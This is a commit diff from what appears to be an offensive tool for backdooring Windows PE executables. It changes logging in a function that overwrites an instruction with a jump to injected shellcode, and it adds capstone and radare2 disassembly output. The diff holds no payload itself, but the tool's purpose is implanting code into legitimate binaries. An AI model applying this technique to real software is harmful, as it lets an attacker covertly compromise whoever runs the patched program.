feature: put payload into .rdata option

pe/derbackdoorer.py

@@ -36,15 +36,14 @@ class FunctionBackdoorer:
 
 
     def backdoor_function(self, function_addr: int, shellcode_addr: int, shellcode_len: int):
-        logger.info("Backdooring function at 0x{:X} (to shellcode 0x{:X})".format(function_addr, shellcode_addr))
+        logger.info("Backdooring function at 0x{:X} (jump to shellcode at 0x{:X})".format(function_addr, shellcode_addr))
         
         addr = self.find_suitable_instruction_addr(function_addr)
         if addr is None:
             raise Exception("Couldn't find a suitable instruction to backdoor")
 
         compiled_trampoline = assemble_relative_jmp(addr, shellcode_addr)
-        logger.info("--[ Backdoor 0x{:X}: {}".format(
-            addr, compiled_trampoline.hex()))
+        logger.info("--[ Backdoor Instruction at 0x{:X} (offset to shellcode: 0x{:X})".format(addr, shellcode_addr - addr))
         
         # Check for overlap
         it = IntervalTree()
@@ -58,10 +57,20 @@ class FunctionBackdoorer:
         # write
         self.superpe.pe.set_bytes_at_rva(addr, bytes(compiled_trampoline))
 
+        # Show Result
+        logger.info("--[ Patched result of function: ".format())
+        data = self.pe_data[function_addr:addr+len(compiled_trampoline)]
+        self.asm_disasm(data, offset=function_addr)
+
+
+    def asm_disasm(self, asm_text, offset=0):
+        for instr in self.cs.disasm(asm_text, offset):
+            self.printInstr(instr, 0)
+
 
     def find_suitable_instruction_addr(self, startOffset, length=256):
         """Find a instruction to backdoor. Recursively."""
-        logger.info("find suitable instr to hijack: off: from 0x{:X} len:{} depthopt:{}".format(
+        logger.info("find suitable instruction to hijack starting from 0x{:X} len:{} depthopt:{}".format(
             startOffset, length, self.depth_option))
 
         if self.depth_option == DEPTH_OPTIONS.LEVEL1:
@@ -79,8 +88,6 @@ class FunctionBackdoorer:
 
 
     def _find_suitable_instruction_addr(self, startOffset, length, option):
-        #logger.info("_find_suitable_instruction_addr: off: 0x{:X} len:{} option:{}".format(startOffset, length, option))
-
         # iterate through every instruction. starting from startOffset
         data = self.pe_data[startOffset:startOffset + length]
         for instr in self.cs.disasm(data, startOffset):

pe/pehelper.py

@@ -2,7 +2,7 @@ import sys
 import pefile
 import pprint
 from keystone import Ks, KS_ARCH_X86, KS_MODE_64
-from capstone import Cs, CS_ARCH_X86, CS_MODE_64
+from capstone import Cs, CS_ARCH_X86, CS_MODE_64, CS_MODE_LITTLE_ENDIAN
 import logging
 
 from model.defs import *
@@ -67,6 +67,7 @@ def get_code_section(pe: pefile.PE) -> pefile.SectionStructure:
 
 
 # keystone/capstone stuff
+cs = Cs(CS_ARCH_X86, CS_MODE_64 + CS_MODE_LITTLE_ENDIAN)
 
 def assemble_lea(current_address: int, destination_address: int, reg: str) -> bytes:
     #print("LEAH: 0x{:X} - 0x{:X} = 0x{:X}".format(
@@ -104,6 +105,18 @@ def assemble_relative_jmp(current_address: int, destination_address: int) -> byt
     return machine_code
 
 
+def asm_disasm(asm_text, offset=0):
+    for instr in cs.disasm(asm_text, offset):
+        printInstr(instr)
+
+def printInstr(instr, depth=0):
+    _bytes = [f'{x:02x}' for x in instr.bytes[:8]]
+    if len(instr.bytes) < 8:
+        _bytes.extend(['  ',] * (8 - len(instr.bytes)))
+    instrBytes = ' '.join([f'{x}' for x in _bytes])
+    logger.info('\t' * 1 + f'    [{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}')
+
+
 ## Utils
 
 def remove_trailing_null_bytes(data: bytes) -> bytes:

pe/r2helper.py

@@ -28,6 +28,7 @@ def r2_disas(data: bytes):
     r2.cmd('aaa')
 
     r2.cmd('e scr.color=0')
+    r2.cmd('e asm.bytes=true')
     ret['text'] = r2.cmd('pD {}'.format(code_len))
     ret['text'] = '\n'.join(ret['text'].splitlines())  # fix newlines